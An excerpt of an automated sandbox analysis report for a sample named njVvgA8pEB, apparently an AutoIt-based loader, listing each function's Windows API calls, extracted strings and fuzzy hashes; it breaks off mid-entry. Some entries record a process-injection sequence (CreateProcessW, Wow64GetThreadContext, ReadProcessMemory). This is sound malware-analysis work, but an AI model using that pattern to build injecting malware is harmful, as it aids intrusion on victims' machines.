                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                          • API String ID: 2914291525-1005189915
                                                                          • Opcode ID: edaf6674672fd35454cecbfc152bbddf3f6e3764f08e347b8415cc58b4afa934
                                                                          • Instruction ID: 42f8038222af03448920f99ca7724654e3c6e9a0794872c0e1da9936791dc74d
                                                                          • Opcode Fuzzy Hash: edaf6674672fd35454cecbfc152bbddf3f6e3764f08e347b8415cc58b4afa934
                                                                          • Instruction Fuzzy Hash: 7C21C5B5A01718AFDB02DFA4E849BDDBBF8FB08701F10412BF510E62A0D7B245549F91

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 00314706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,003D52F8,?,003137AE,?), ref: 00314724
                                                                            • Part of subcall function 0033050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00317165), ref: 0033052D
                                                                          • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 003171A8
                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0034E8C8
                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0034E909
                                                                          • RegCloseKey.ADVAPI32(?), ref: 0034E947
                                                                          • _wcscat.LIBCMT ref: 0034E9A0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                          • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                          • API String ID: 2673923337-2727554177
                                                                          • Opcode ID: 8a45a3d9d0148926360026df849bbef11c3818e2c227526152f32b5bf71d7447
                                                                          • Instruction ID: 5deeb473116660ca58ca86e8a004dd1059f7a97c27334c93c4d76da152f30692
                                                                          • Opcode Fuzzy Hash: 8a45a3d9d0148926360026df849bbef11c3818e2c227526152f32b5bf71d7447
                                                                          • Instruction Fuzzy Hash: E3715D715093019EC706EF65E8829ABBBFCFF89310F44092FF4558B2A1DB719949CB52

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • DefWindowProcW.USER32(?,?,?,?), ref: 003136D2
                                                                          • KillTimer.USER32(?,00000001), ref: 003136FC
                                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0031371F
                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0031372A
                                                                          • CreatePopupMenu.USER32 ref: 0031373E
                                                                          • PostQuitMessage.USER32(00000000), ref: 0031374D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                          • String ID: TaskbarCreated$%:
                                                                          • API String ID: 129472671-2385568900
                                                                          • Opcode ID: c2c04eb59e519b7ae76ca12a7922f8d8c63a47a90bcd61580f2b8c8d3665d4a7
                                                                          • Instruction ID: 770ce565de6c03cb2404ca5c25681a1b392b8807bc7d018bad6dd77e4054fffe
                                                                          • Opcode Fuzzy Hash: c2c04eb59e519b7ae76ca12a7922f8d8c63a47a90bcd61580f2b8c8d3665d4a7
                                                                          • Instruction Fuzzy Hash: F14104B6200545BBDB2B6F64FC49BFA3BACEB08301F140526F502DB2E1DB719E949761

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00313A50
                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00313A5F
                                                                          • LoadIconW.USER32(00000063), ref: 00313A76
                                                                          • LoadIconW.USER32(000000A4), ref: 00313A88
                                                                          • LoadIconW.USER32(000000A2), ref: 00313A9A
                                                                          • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00313AC0
                                                                          • RegisterClassExW.USER32(?), ref: 00313B16
                                                                            • Part of subcall function 00313041: GetSysColorBrush.USER32(0000000F), ref: 00313074
                                                                            • Part of subcall function 00313041: RegisterClassExW.USER32(00000030), ref: 0031309E
                                                                            • Part of subcall function 00313041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003130AF
                                                                            • Part of subcall function 00313041: InitCommonControlsEx.COMCTL32(?), ref: 003130CC
                                                                            • Part of subcall function 00313041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003130DC
                                                                            • Part of subcall function 00313041: LoadIconW.USER32(000000A9), ref: 003130F2
                                                                            • Part of subcall function 00313041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00313101
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                          • String ID: #$0$AutoIt v3
                                                                          • API String ID: 423443420-4155596026
                                                                          • Opcode ID: 8c01ab6c8b13c231ee82e9cc07e9f799af14fd881ea8e11af2bb8796de6d283b
                                                                          • Instruction ID: 0b1ddfcc55f31c999d691d795e6a73db4952796abd5944b4b35697c3da59ce49
                                                                          • Opcode Fuzzy Hash: 8c01ab6c8b13c231ee82e9cc07e9f799af14fd881ea8e11af2bb8796de6d283b
                                                                          • Instruction Fuzzy Hash: 6E212B71D02304AFEB12DFA4FC49BAD7BB9FB08712F10052BF504AA2A1D3B656548F94

                                                                          Control-flow Graph

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                          • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$R=
                                                                          • API String ID: 1825951767-3451155357
                                                                          • Opcode ID: 422daf932921e510e0616095c6f12c3abe385f3517d3faa47668f8a063ca1778
                                                                          • Instruction ID: b6fd93bdb2b19c3325830c813851592a5b162168a8887a0402e690dcef5adf41
                                                                          • Opcode Fuzzy Hash: 422daf932921e510e0616095c6f12c3abe385f3517d3faa47668f8a063ca1778
                                                                          • Instruction Fuzzy Hash: BBA14E7291021DAACF0AEBA4DC91EEEB77CBF19310F44052AF415BB191DF745A89CB60

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 00330162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00330193
                                                                            • Part of subcall function 00330162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0033019B
                                                                            • Part of subcall function 00330162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 003301A6
                                                                            • Part of subcall function 00330162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 003301B1
                                                                            • Part of subcall function 00330162: MapVirtualKeyW.USER32(00000011,00000000), ref: 003301B9
                                                                            • Part of subcall function 00330162: MapVirtualKeyW.USER32(00000012,00000000), ref: 003301C1
                                                                            • Part of subcall function 003260F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0031F930), ref: 00326154
                                                                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0031F9CD
                                                                          • OleInitialize.OLE32(00000000), ref: 0031FA4A
                                                                          • CloseHandle.KERNEL32(00000000), ref: 003545C8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                          • String ID: <W=$\T=$%:$S=
                                                                          • API String ID: 1986988660-2225256949
                                                                          • Opcode ID: d5046c3a2b9d547aba6422b0ff97902f5f027e5e02769a3b167edd027879bec0
                                                                          • Instruction ID: 730cf85b6d86855e41297174f7fcf509f9711e1d7049362226ed3af13e8ebfc7
                                                                          • Opcode Fuzzy Hash: d5046c3a2b9d547aba6422b0ff97902f5f027e5e02769a3b167edd027879bec0
                                                                          • Instruction Fuzzy Hash: 36819DB5906A408FC387DF3AB9456597BFDFB59306FA0812BE019CB361EB7044858F12

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 012F9851
                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 012F9A77
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1723027581.00000000012F7000.00000040.00000020.00020000.00000000.sdmp, Offset: 012F7000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_12f7000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFileFreeVirtual
                                                                          • String ID:
                                                                          • API String ID: 204039940-0
                                                                          • Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                          • Instruction ID: 43358cc13471d2100844788d8e70e52cf862adbcfca8d188ca125be5a46414f3
                                                                          • Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                          • Instruction Fuzzy Hash: E5A11870E1020AEBDF14CFA4C895BEEFBB5FF48304F108569E205AB280D7759A85CB55

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00313A03
                                                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00313A24
                                                                          • ShowWindow.USER32(00000000,?,?), ref: 00313A38
                                                                          • ShowWindow.USER32(00000000,?,?), ref: 00313A41
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Window$CreateShow
                                                                          • String ID: AutoIt v3$edit
                                                                          • API String ID: 1584632944-3779509399
                                                                          • Opcode ID: 2dc92d5fca1dc1fb0b7fc95ad1229fbbc036af5d58f85bf3ef4f772575b27958
                                                                          • Instruction ID: 8c3524694cd057653d16ff85a4549aca1ee5e1ed8b4d09c11f66955cbf346801
                                                                          • Opcode Fuzzy Hash: 2dc92d5fca1dc1fb0b7fc95ad1229fbbc036af5d58f85bf3ef4f772575b27958
                                                                          • Instruction Fuzzy Hash: 39F0D471A42690BEEB325B67BC49E6B2F7DE7C6F50F00452BB904E21B0C6721855DAB0

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 012F9450: Sleep.KERNELBASE(000001F4), ref: 012F9461
                                                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 012F9672
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1723027581.00000000012F7000.00000040.00000020.00020000.00000000.sdmp, Offset: 012F7000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_12f7000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFileSleep
                                                                          • String ID: 06XJBKZHR2
                                                                          • API String ID: 2694422964-1194987141
                                                                          • Opcode ID: 3650f9d682832f1ed9e60337670bae22ba0b688ad5a3c16e82361743d0bc58b1
                                                                          • Instruction ID: e6911a1f261ba7d90671243d4c67efa1afc49225db86d1c90d456cf0efa3c150
                                                                          • Opcode Fuzzy Hash: 3650f9d682832f1ed9e60337670bae22ba0b688ad5a3c16e82361743d0bc58b1
                                                                          • Instruction Fuzzy Hash: 65519F70D10249EBEF15DBA4C855BEEBB79EF18304F0041A9E709BB2C0D6790B85CBA5

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0034D3D7
                                                                            • Part of subcall function 00317BCC: _memmove.LIBCMT ref: 00317C06
                                                                          • _memset.LIBCMT ref: 003140FC
                                                                          • _wcscpy.LIBCMT ref: 00314150
                                                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00314160
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                          • String ID: Line:
                                                                          • API String ID: 3942752672-1585850449
                                                                          • Opcode ID: bca3d6e58bb008d1a18c9fed037909bcfe7fa9076cb455bf708faab24ba64c19
                                                                          • Instruction ID: 4028b72e135bfd191ffc76d9763d4a82b86fa4a26d6e04cb2892987c7914d4cb
                                                                          • Opcode Fuzzy Hash: bca3d6e58bb008d1a18c9fed037909bcfe7fa9076cb455bf708faab24ba64c19
                                                                          • Instruction Fuzzy Hash: 7731B272008304AFD32BEB60EC46FDB77ECAF48300F14491BF58596091EB70A698C782
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                          • String ID:
                                                                          • API String ID: 1559183368-0
                                                                          • Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                                          • Instruction ID: ff6bf83f6636066c4b135e35931671e67f90ef6b9aa9a4de62f1f154add92e8d
                                                                          • Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                                          • Instruction Fuzzy Hash: 0C51C971A00B05DBDB2A8F69D8C066E77B6EF41331F258729F8369A6D0D771ED908B40
                                                                          APIs
                                                                            • Part of subcall function 00314DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,003D52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00314E0F
                                                                          • _free.LIBCMT ref: 0034E263
                                                                          • _free.LIBCMT ref: 0034E2AA
                                                                            • Part of subcall function 00316A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00316BAD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: _free$CurrentDirectoryLibraryLoad
                                                                          • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                          • API String ID: 2861923089-1757145024
                                                                          • Opcode ID: f994bf6ef1f644503473f00f422b542109a5d072aadc70c4560f02bd0c0bd4bb
                                                                          • Instruction ID: b6e0f97e9e4b1a33d0dad2ac046e24959a727436aa35c658033a8f74b2cc7e37
                                                                          • Opcode Fuzzy Hash: f994bf6ef1f644503473f00f422b542109a5d072aadc70c4560f02bd0c0bd4bb
                                                                          • Instruction Fuzzy Hash: 6B915B71900219EFCF1AEFA4DC919EDB7B8FF09310B14442AF815AF2A1DB74A955CB50
                                                                          APIs
                                                                          • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,003135A1,SwapMouseButtons,00000004,?), ref: 003135D4
                                                                          • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,003135A1,SwapMouseButtons,00000004,?,?,?,?,00312754), ref: 003135F5
                                                                          • RegCloseKey.KERNELBASE(00000000,?,?,003135A1,SwapMouseButtons,00000004,?,?,?,?,00312754), ref: 00313617
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                           • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpenQueryValue
                                                                          • String ID: Control Panel\Mouse
                                                                          • API String ID: 3677997916-824357125
                                                                          • Opcode ID: 36f4fd304ed9f65336ea6c2973483fefab936a84967ab009d703edd92ae044d9
                                                                          • Instruction ID: ceebb5439caed7d9fdd84cf8d091c1bc7cde5c267e35a7bf009c2c51bbbbbabb
                                                                          • Opcode Fuzzy Hash: 36f4fd304ed9f65336ea6c2973483fefab936a84967ab009d703edd92ae044d9
                                                                          • Instruction Fuzzy Hash: 0F114871614208BFDB268F64DC809EFB7BCEF48740F01446AE805D7210D2719E949760
                                                                          APIs
                                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 012F8C7D
                                                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 012F8CA1
                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 012F8CC3
                                                                          • TerminateProcess.KERNELBASE(00000000,00000000,?), ref: 012F8FCC
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1723027581.00000000012F7000.00000040.00000020.00020000.00000000.sdmp, Offset: 012F7000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_12f7000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Process$ContextCreateMemoryReadTerminateThreadWow64
                                                                          • String ID:
                                                                          • API String ID: 572931308-0
                                                                          • Opcode ID: 766b881ec6164bc259338bbbecc08836d97cc5066010a81dd887eea552f5ff52
                                                                          • Instruction ID: c8959e38e8885f766dd4dcbb7d69377c02e3899dcd4be623fe123eb61f93f26a
                                                                          • Opcode Fuzzy Hash: 766b881ec6164bc259338bbbecc08836d97cc5066010a81dd887eea552f5ff52
                                                                          • Instruction Fuzzy Hash: 27620D30A24259DBEB24CFA4C851BDEB772EF58300F1091A9D20DEB390E7759E81CB59
                                                                          APIs
                                                                            • Part of subcall function 00314EE5: _fseek.LIBCMT ref: 00314EFD
                                                                            • Part of subcall function 00379734: _wcscmp.LIBCMT ref: 00379824
                                                                            • Part of subcall function 00379734: _wcscmp.LIBCMT ref: 00379837
                                                                          • _free.LIBCMT ref: 003796A2
                                                                          • _free.LIBCMT ref: 003796A9
                                                                          • _free.LIBCMT ref: 00379714
                                                                            • Part of subcall function 00332D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00339A24), ref: 00332D69
                                                                            • Part of subcall function 00332D55: GetLastError.KERNEL32(00000000,?,00339A24), ref: 00332D7B
                                                                          • _free.LIBCMT ref: 0037971C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                           • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                          • String ID:
                                                                          • API String ID: 1552873950-0
                                                                          • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                          • Instruction ID: 082f3c23d927ba86df9f262531ba9ec28f657e8e3afa0bca6843431aec14e327
                                                                          • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                          • Instruction Fuzzy Hash: E5515DB1D04258AFDF2A9F64CC81A9EBBB9EF48300F10459EF20DA7241DB755A91CF58
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                           • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                          • String ID:
                                                                          • API String ID: 2782032738-0
                                                                          • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                          • Instruction ID: 0607171fcca184072673aeaaf2dfb5840113c97d9d79c3221a4bca774741b2d6
                                                                          • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                          • Instruction Fuzzy Hash: 7141D775B007469BDB1ACF69D8C09AE77A5EF42360F24817DE825CB650E771FD818B40
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                           • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID: AU3!P/:$EA06
